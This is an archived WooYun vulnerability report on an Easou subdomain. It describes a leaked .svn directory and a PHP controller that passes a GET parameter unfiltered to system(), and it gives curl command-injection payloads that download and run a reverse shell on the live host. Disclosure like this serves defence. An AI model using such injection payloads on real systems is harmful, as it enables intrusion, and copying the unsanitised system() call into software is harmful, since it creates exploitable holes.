当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2014-087818
漏洞标题:
宜搜某分站配置不当已被getshell
相关厂商:
easou.com
漏洞作者:
米兰的小铁匠
提交时间:
2014-12-19 14:51
修复时间:
2015-02-02 14:52
公开时间:
2015-02-02 14:52
漏洞类型:
成功的入侵事件
危害等级:
自评Rank:
20
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2014-12-19: 细节已通知厂商并且等待厂商处理中
2014-12-19: 厂商已经确认,细节仅向厂商公开
2014-12-29: 细节向核心白帽子及相关领域专家公开
2015-01-08: 细节向普通白帽子公开
2015-01-18: 细节向实习白帽子公开
2015-02-02: 细节向公众公开

简要描述:

某神器扫描到。。。

详细说明:

某神器扫描到 svn地址泄露
http://wall.easou.com/.svn/entries
直接下载源码, 基于yii框架,文件
/protected/controllers/ProController.php

//开发者后台sdk下载(可以改包名)
    public function actionGetPackageName2()
    {
        $packageName='';
        $SDKType='';
        //   $url_base='http://winads.cn:80';
        if(isset($_GET['packageName']))$packageName=$_GET['packageName'];
        if(isset($_GET['SDKType']))$SDKType=$_GET['SDKType'];
        //报名前缀
        $filename_list=array(1=>'banner-',2=>'adwall-',3=>'offers-',4=>'alert-',5=>'push-');
        $filename=$filename_list[$SDKType].time();
        $aid=1;//代理号
        //  $command_str="/var/lib/jdk1.6.0_22/bin/java -jar /home/ledian/autosdk.jar {$packageName} {$SDKType} {$aid} {$filename}";
        // $aa = exec("/usr/bin/id");
        // $bb = system($command_str);
        // var_dump($aa);
        // var_dump($bb);
        // system("/home/ledian/autopack.sh {$packageName} {$SDKType} {$aid} {$filename}");
        system("/var/www/xyz/site/autopack.sh {$packageName} {$SDKType} {$aid} {$filename}");
        $url='http://sdkdown.winads.cn/sdkoutPack/'.$filename.'.zip';
//sdkoutPack
        echo '{"state":"OK","url":"'.$url.'"}';
        exit;
    }


额 system函数未过滤,导致命令注入,直接反弹shell
curl "http://wall.easou.com/index.php?r=pro/getpackagename2&packageName=| wget -O xxx |"
curl "http://wall.easou.com/index.php?r=pro/getpackagename2&packageName=| python /tmp/test.py xxx xxx |"
见漏洞证明吧

漏洞证明:

额,直接反弹shell,反弹shell程序在/tmp/test.py 请自行删除
在机器 /etc/nginx/sites-enabled ls结果如下:麻烦自行检测确认

easou.png


修复方案:

修复命令执行,修复svn泄露

版权声明:转载请注明来源 米兰的小铁匠@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-19 14:59

厂商回复:

谢谢指出,我们会及时改正

最新状态:

暂无